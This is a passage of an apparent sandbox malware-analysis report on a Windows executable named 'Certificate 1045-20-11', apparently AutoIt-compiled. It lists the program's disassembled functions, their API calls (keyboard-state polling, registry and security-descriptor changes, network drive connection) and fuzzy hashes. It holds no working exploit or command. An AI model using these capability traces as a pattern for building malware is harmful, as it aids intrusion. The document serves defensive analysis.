                                                                                • GlobalFree.KERNEL32(00000000), ref: 008AE7E5
                                                                                • GetObjectW.GDI32(?,00000018,000000FF), ref: 008AE809
                                                                                • CopyImage.USER32(?,00000000,?,?,00002000), ref: 008AE834
                                                                                • DeleteObject.GDI32(00000000), ref: 008AE85C
                                                                                • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 008AE872
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
• Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                • String ID:
                                                                                • API String ID: 3840717409-0
                                                                                • Opcode ID: 41750e2ca59616e3a3dd7bea96374e3679c524d30d266f80df5d41ae2450eb08
                                                                                • Instruction ID: e5ceb4bd6935bd45acb0469f23242383e714fd3ab64307d0e24b9847ac2934d6
                                                                                • Opcode Fuzzy Hash: 41750e2ca59616e3a3dd7bea96374e3679c524d30d266f80df5d41ae2450eb08
                                                                                • Instruction Fuzzy Hash: 27412975600308EFDB11AF65DC88EAABBB8FF8A715F108468F905D7260D774A941DB60
                                                                                APIs
                                                                                • __wsplitpath.LIBCMT ref: 0089076F
                                                                                • _wcscat.LIBCMT ref: 00890787
                                                                                • _wcscat.LIBCMT ref: 00890799
                                                                                • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 008907AE
                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 008907C2
                                                                                • GetFileAttributesW.KERNEL32(?), ref: 008907DA
                                                                                • SetFileAttributesW.KERNEL32(?,00000000), ref: 008907F4
                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00890806
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
• Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
Similarity
• API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
• String ID: *.*
• API String ID: 34673085-438819550
APIs
  • Part of subcall function 0085B34E: GetWindowLongW.USER32(?,000000EB), ref: 0085B35F
• PostMessageW.USER32(?,00000111,00000000,00000000), ref: 008AEF3B
• GetFocus.USER32 ref: 008AEF4B
• GetDlgCtrlID.USER32(00000000), ref: 008AEF56
• _memset.LIBCMT ref: 008AF081
• GetMenuItemInfoW.USER32 ref: 008AF0AC
• GetMenuItemCount.USER32(00000000), ref: 008AF0CC
• GetMenuItemID.USER32(?,00000000), ref: 008AF0DF
• GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 008AF113
• GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 008AF15B
• CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 008AF193
• DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 008AF1C8
Similarity
• API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
• String ID: 0
• API String ID: 1296962147-4108050209
APIs
  • Part of subcall function 0087ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0087ABD7
  • Part of subcall function 0087ABBB: GetLastError.KERNEL32(?,0087A69F,?,?,?), ref: 0087ABE1
  • Part of subcall function 0087ABBB: GetProcessHeap.KERNEL32(00000008,?,?,0087A69F,?,?,?), ref: 0087ABF0
  • Part of subcall function 0087ABBB: HeapAlloc.KERNEL32(00000000,?,0087A69F,?,?,?), ref: 0087ABF7
  • Part of subcall function 0087ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0087AC0E
  • Part of subcall function 0087AC56: GetProcessHeap.KERNEL32(00000008,0087A6B5,00000000,00000000,?,0087A6B5,?), ref: 0087AC62
  • Part of subcall function 0087AC56: HeapAlloc.KERNEL32(00000000,?,0087A6B5,?), ref: 0087AC69
  • Part of subcall function 0087AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0087A6B5,?), ref: 0087AC7A
• GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0087A8CB
• _memset.LIBCMT ref: 0087A8E0
• GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0087A8FF
• GetLengthSid.ADVAPI32(?), ref: 0087A910
• GetAce.ADVAPI32(?,00000000,?), ref: 0087A94D
• AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0087A969
• GetLengthSid.ADVAPI32(?), ref: 0087A986
• GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0087A995
• HeapAlloc.KERNEL32(00000000), ref: 0087A99C
• GetLengthSid.ADVAPI32(?,00000008,?), ref: 0087A9BD
• CopySid.ADVAPI32(00000000), ref: 0087A9C4
• AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0087A9F5
• SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0087AA1B
• SetUserObjectSecurity.USER32(?,00000004,?), ref: 0087AA2F
Similarity
• API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
• String ID:
• API String ID: 3996160137-0
APIs
• GetDC.USER32(00000000), ref: 00899E36
• CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00899E42
• CreateCompatibleDC.GDI32(?), ref: 00899E4E
• SelectObject.GDI32(00000000,?), ref: 00899E5B
• StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00899EAF
• GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 00899EEB
• GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00899F0F
• SelectObject.GDI32(00000006,?), ref: 00899F17
• DeleteObject.GDI32(?), ref: 00899F20
• DeleteDC.GDI32(00000006), ref: 00899F27
• ReleaseDC.USER32(00000000,?), ref: 00899F32
Similarity
• API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
• String ID: (
• API String ID: 2598888154-3887548279
Similarity
• API ID: LoadString__swprintf_wprintf
• String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
• API String ID: 2889450990-2391861430
Similarity
• API ID: LoadString__swprintf_wprintf
• String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
• API String ID: 2889450990-3420473620
APIs
• _memset.LIBCMT ref: 008855D7
• GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00885664
• GetMenuItemCount.USER32(00901708), ref: 008856ED
• DeleteMenu.USER32(00901708,00000005,00000000,000000F5,?,?), ref: 0088577D
• DeleteMenu.USER32(00901708,00000004,00000000), ref: 00885785
• DeleteMenu.USER32(00901708,00000006,00000000), ref: 0088578D
• DeleteMenu.USER32(00901708,00000003,00000000), ref: 00885795
• GetMenuItemCount.USER32(00901708), ref: 0088579D
• SetMenuItemInfoW.USER32(00901708,00000004,00000000,00000030), ref: 008857D3
• GetCursorPos.USER32(?), ref: 008857DD
• SetForegroundWindow.USER32(00000000), ref: 008857E6
• TrackPopupMenuEx.USER32(00901708,00000000,?,00000000,00000000,00000000), ref: 008857F9
• PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00885805
Similarity
• API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
• String ID:
• API String ID: 3993528054-0
APIs
• _memset.LIBCMT ref: 0087A1DC
• WNetAddConnection2W.MPR(?,?,?,00000000), ref: 0087A211
• RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0087A22D
• RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 0087A249
• RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 0087A273
• CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0087A29B
• RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0087A2A6
• RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0087A2AB
Similarity
• API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset
• String ID: SOFTWARE\Classes\$\CLSID$\IPC$
• API String ID: 1687751970-22481851
APIs
• CharUpperBuffW.USER32(?,?,?,?,?,?,?,008A2BB5,?,?), ref: 008A3C1D
                                                                                Similarity
                                                                                • API ID: BuffCharUpper
                                                                                • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                • API String ID: 3964851224-909552448
                                                                                APIs
                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,008B36F4,00000010,?,Bad directive syntax error,008DDC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 008825D6
                                                                                • LoadStringW.USER32(00000000,?,008B36F4,00000010), ref: 008825DD
                                                                                • _wprintf.LIBCMT ref: 00882610
                                                                                • __swprintf.LIBCMT ref: 00882632
                                                                                • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 008826A1
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: HandleLoadMessageModuleString__swprintf_wprintf
                                                                                • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                • API String ID: 1080873982-4153970271
                                                                                APIs
                                                                                • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00887B42
                                                                                • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00887B58
                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00887B69
                                                                                • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00887B7B
                                                                                • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00887B8C
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: SendString
                                                                                • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                • API String ID: 890592661-1007645807
                                                                                APIs
                                                                                • timeGetTime.WINMM ref: 00887794
                                                                                  • Part of subcall function 0085DC38: timeGetTime.WINMM(?,75C0B400,008B58AB), ref: 0085DC3C
                                                                                • Sleep.KERNEL32(0000000A), ref: 008877C0
                                                                                • EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 008877E4
                                                                                • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00887806
                                                                                • SetActiveWindow.USER32 ref: 00887825
                                                                                • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00887833
                                                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 00887852
                                                                                • Sleep.KERNEL32(000000FA), ref: 0088785D
                                                                                • IsWindow.USER32 ref: 00887869
                                                                                • EndDialog.USER32(00000000), ref: 0088787A
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                • String ID: BUTTON
                                                                                • API String ID: 1194449130-3405671355
                                                                                APIs
                                                                                  • Part of subcall function 0084936C: __swprintf.LIBCMT ref: 008493AB
                                                                                  • Part of subcall function 0084936C: __itow.LIBCMT ref: 008493DF
                                                                                • CoInitialize.OLE32(00000000), ref: 0089034B
                                                                                • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 008903DE
                                                                                • SHGetDesktopFolder.SHELL32(?), ref: 008903F2
                                                                                • CoCreateInstance.OLE32(008CDA8C,00000000,00000001,008F3CF8,?), ref: 0089043E
                                                                                • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 008904AD
                                                                                • CoTaskMemFree.OLE32(?,?), ref: 00890505
                                                                                • _memset.LIBCMT ref: 00890542
                                                                                • SHBrowseForFolderW.SHELL32(?), ref: 0089057E
                                                                                • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 008905A1
                                                                                • CoTaskMemFree.OLE32(00000000), ref: 008905A8
                                                                                • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 008905DF
                                                                                • CoUninitialize.OLE32(00000001,00000000), ref: 008905E1
                                                                                Similarity
                                                                                • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                                • String ID:
                                                                                • API String ID: 1246142700-0
                                                                                APIs
                                                                                • GetKeyboardState.USER32(?), ref: 00882ED6
                                                                                • SetKeyboardState.USER32(?), ref: 00882F41
                                                                                • GetAsyncKeyState.USER32(000000A0), ref: 00882F61
                                                                                • GetKeyState.USER32(000000A0), ref: 00882F78
                                                                                • GetAsyncKeyState.USER32(000000A1), ref: 00882FA7
                                                                                • GetKeyState.USER32(000000A1), ref: 00882FB8
                                                                                • GetAsyncKeyState.USER32(00000011), ref: 00882FE4
                                                                                • GetKeyState.USER32(00000011), ref: 00882FF2
                                                                                • GetAsyncKeyState.USER32(00000012), ref: 0088301B
                                                                                • GetKeyState.USER32(00000012), ref: 00883029
                                                                                • GetAsyncKeyState.USER32(0000005B), ref: 00883052
                                                                                • GetKeyState.USER32(0000005B), ref: 00883060
                                                                                Similarity
                                                                                • API ID: State$Async$Keyboard
                                                                                • String ID:
                                                                                • API String ID: 541375521-0
                                                                                APIs
                                                                                • GetDlgItem.USER32(?,00000001), ref: 0087ED1E
                                                                                • GetWindowRect.USER32(00000000,?), ref: 0087ED30
                                                                                • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0087ED8E
                                                                                • GetDlgItem.USER32(?,00000002), ref: 0087ED99
                                                                                • GetWindowRect.USER32(00000000,?), ref: 0087EDAB
                                                                                • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0087EE01
                                                                                • GetDlgItem.USER32(?,000003E9), ref: 0087EE0F
                                                                                • GetWindowRect.USER32(00000000,?), ref: 0087EE20
                                                                                • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0087EE63
                                                                                • GetDlgItem.USER32(?,000003EA), ref: 0087EE71
                                                                                • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0087EE8E
                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 0087EE9B
                                                                                Similarity
                                                                                • API ID: Window$ItemMoveRect$Invalidate
                                                                                • String ID:
                                                                                • API String ID: 3096461208-0
                                                                                APIs
                                                                                  • Part of subcall function 0085B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0085B759,?,00000000,?,?,?,?,0085B72B,00000000,?), ref: 0085BA58
                                                                                • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0085B72B), ref: 0085B7F6
                                                                                • KillTimer.USER32(00000000,?,00000000,?,?,?,?,0085B72B,00000000,?,?,0085B2EF,?,?), ref: 0085B88D
                                                                                • DestroyAcceleratorTable.USER32(00000000), ref: 008BD8A6
                                                                                • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0085B72B,00000000,?,?,0085B2EF,?,?), ref: 008BD8D7
                                                                                • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0085B72B,00000000,?,?,0085B2EF,?,?), ref: 008BD8EE
                                                                                • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0085B72B,00000000,?,?,0085B2EF,?,?), ref: 008BD90A
                                                                                • DeleteObject.GDI32(00000000), ref: 008BD91C
                                                                                Similarity
                                                                                • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                • String ID:
                                                                                • API String ID: 641708696-0
                                                                                APIs
                                                                                  • Part of subcall function 0085B526: GetWindowLongW.USER32(?,000000EB), ref: 0085B537
                                                                                • GetSysColor.USER32(0000000F), ref: 0085B438
                                                                                Similarity
                                                                                • API ID: ColorLongWindow
                                                                                • String ID:
                                                                                • API String ID: 259745315-0
                                                                                • Opcode ID: 2dbfadd25842ac2cd6e9c65e9743a38629aabb01a420e264853a3d67c74c1c79
                                                                                • Instruction ID: 93b941ca1f42a9b7b08004ca59f82eb33e3283c1b9e1796a5f801f859e927882
                                                                                • Opcode Fuzzy Hash: 2dbfadd25842ac2cd6e9c65e9743a38629aabb01a420e264853a3d67c74c1c79
                                                                                • Instruction Fuzzy Hash: CA418C31100244AFDB306F28DC89BB93B66FB66736F188265FD65CA1E6D7308C46DB25
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                                • String ID:
                                                                                • API String ID: 136442275-0
                                                                                • Opcode ID: 8d3bb9023746c6a25118ba9cd5036333223b42844791b344a16cfad16e7d5c99
                                                                                • Instruction ID: 333aa2bc90eb1049ee628f94527ca10dde40fbec7cb1c715772a18dee7908296
                                                                                • Opcode Fuzzy Hash: 8d3bb9023746c6a25118ba9cd5036333223b42844791b344a16cfad16e7d5c99
                                                                                • Instruction Fuzzy Hash: 21411C7688512CAECF65EB94CC46DDB73BCFB44310F0041A6F659E2151EA30ABE48F55
                                                                                APIs
                                                                                • CharLowerBuffW.USER32(008DDC00,008DDC00,008DDC00), ref: 0088D7CE
                                                                                • GetDriveTypeW.KERNEL32(?,008F3A70,00000061), ref: 0088D898
                                                                                • _wcscpy.LIBCMT ref: 0088D8C2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: BuffCharDriveLowerType_wcscpy
                                                                                • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                • API String ID: 2820617543-1000479233
                                                                                • Opcode ID: 846e84ff450eaae526d163aba72cd39d6279a81bacdd1d5ffc5e89040fcad1d5
                                                                                • Instruction ID: 92104222ac8f92c28c67356509634f561305c310429666755c2dfc6d4a8ca08a
                                                                                • Opcode Fuzzy Hash: 846e84ff450eaae526d163aba72cd39d6279a81bacdd1d5ffc5e89040fcad1d5
                                                                                • Instruction Fuzzy Hash: 78515D31114304AFC714FF18D892A6AB7A5FF94314F10892DF99AD72A2DB31DE09CB42
                                                                                APIs
                                                                                • __swprintf.LIBCMT ref: 008493AB
                                                                                • __itow.LIBCMT ref: 008493DF
                                                                                  • Part of subcall function 00861557: _xtow@16.LIBCMT ref: 00861578
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: __itow__swprintf_xtow@16
                                                                                • String ID: %.15g$0x%p$False$True
                                                                                • API String ID: 1502193981-2263619337
                                                                                • Opcode ID: 8a96c4421c4a810422feec5dbc49dfac7cdd90e717be1f46d11f36403eb0608e
                                                                                • Instruction ID: e68daef317ff2c7123d21e4ff296721cf4c5d0d125d1d934bdcfe0598a0196a3
                                                                                • Opcode Fuzzy Hash: 8a96c4421c4a810422feec5dbc49dfac7cdd90e717be1f46d11f36403eb0608e
                                                                                • Instruction Fuzzy Hash: E541E43150020CABDB24DF78D942EAAB7E8FF45304F24546AE68AD7383EA319941CB11
                                                                                APIs
                                                                                • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 008AA259
                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 008AA260
                                                                                • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 008AA273
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 008AA27B
                                                                                • GetPixel.GDI32(00000000,00000000,00000000), ref: 008AA286
                                                                                • DeleteDC.GDI32(00000000), ref: 008AA28F
                                                                                • GetWindowLongW.USER32(?,000000EC), ref: 008AA299
                                                                                • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 008AA2AD
                                                                                • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 008AA2B9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                • String ID: static
                                                                                • API String ID: 2559357485-2160076837
                                                                                • Opcode ID: d1165e0c88f4264afb7fd8cf14a94524dc350cc55b893886e9f21ffe525c045f
                                                                                • Instruction ID: 9f8bd2cf55254b12fd96fb29ef042b1a0fbd9447b0b72728a8ff6d297170535b
                                                                                • Opcode Fuzzy Hash: d1165e0c88f4264afb7fd8cf14a94524dc350cc55b893886e9f21ffe525c045f
                                                                                • Instruction Fuzzy Hash: 6D316F31100215AFEF256FA4DC49FEA3B79FF1A360F110229FA19E65A0C735D821DBA5
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                                • String ID: 0.0.0.0
                                                                                • API String ID: 2620052-3771769585
                                                                                • Opcode ID: b43c9725045692caa80f117d82e9d05a5623dc0fb7fcc38bf97a6c6ce61c6dab
                                                                                • Instruction ID: 4d4c381f928bbcb7d788c6b77d365012604a953c3b8450cbc64c326d370ff4f0
                                                                                • Opcode Fuzzy Hash: b43c9725045692caa80f117d82e9d05a5623dc0fb7fcc38bf97a6c6ce61c6dab
                                                                                • Instruction Fuzzy Hash: 4411E172904218ABCB25BB74AC0AEEA77BCFF40710F0101B5F605E6081FF74EA858B51
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 00865047
                                                                                  • Part of subcall function 00867C0E: __getptd_noexit.LIBCMT ref: 00867C0E
                                                                                • __gmtime64_s.LIBCMT ref: 008650E0
                                                                                • __gmtime64_s.LIBCMT ref: 00865116
                                                                                • __gmtime64_s.LIBCMT ref: 00865133
                                                                                • __allrem.LIBCMT ref: 00865189
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008651A5
                                                                                • __allrem.LIBCMT ref: 008651BC
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008651DA
                                                                                • __allrem.LIBCMT ref: 008651F1
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0086520F
                                                                                • __invoke_watson.LIBCMT ref: 00865280
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                • String ID:
                                                                                • API String ID: 384356119-0
                                                                                • Opcode ID: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                                                • Instruction ID: 1c57f6608d4148f492767a319feb3e035ccf85114160441b95614b4429f94e64
                                                                                • Opcode Fuzzy Hash: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                                                • Instruction Fuzzy Hash: 0471D672A00F17ABDB14AE7CCC51B5AB3A8FF01764F158229F514DA781E770D9408BD1
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 00884DF8
                                                                                • GetMenuItemInfoW.USER32(00901708,000000FF,00000000,00000030), ref: 00884E59
                                                                                • SetMenuItemInfoW.USER32(00901708,00000004,00000000,00000030), ref: 00884E8F
                                                                                • Sleep.KERNEL32(000001F4), ref: 00884EA1
                                                                                • GetMenuItemCount.USER32(?), ref: 00884EE5
                                                                                • GetMenuItemID.USER32(?,00000000), ref: 00884F01
                                                                                • GetMenuItemID.USER32(?,-00000001), ref: 00884F2B
                                                                                • GetMenuItemID.USER32(?,?), ref: 00884F70
                                                                                • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00884FB6
                                                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00884FCA
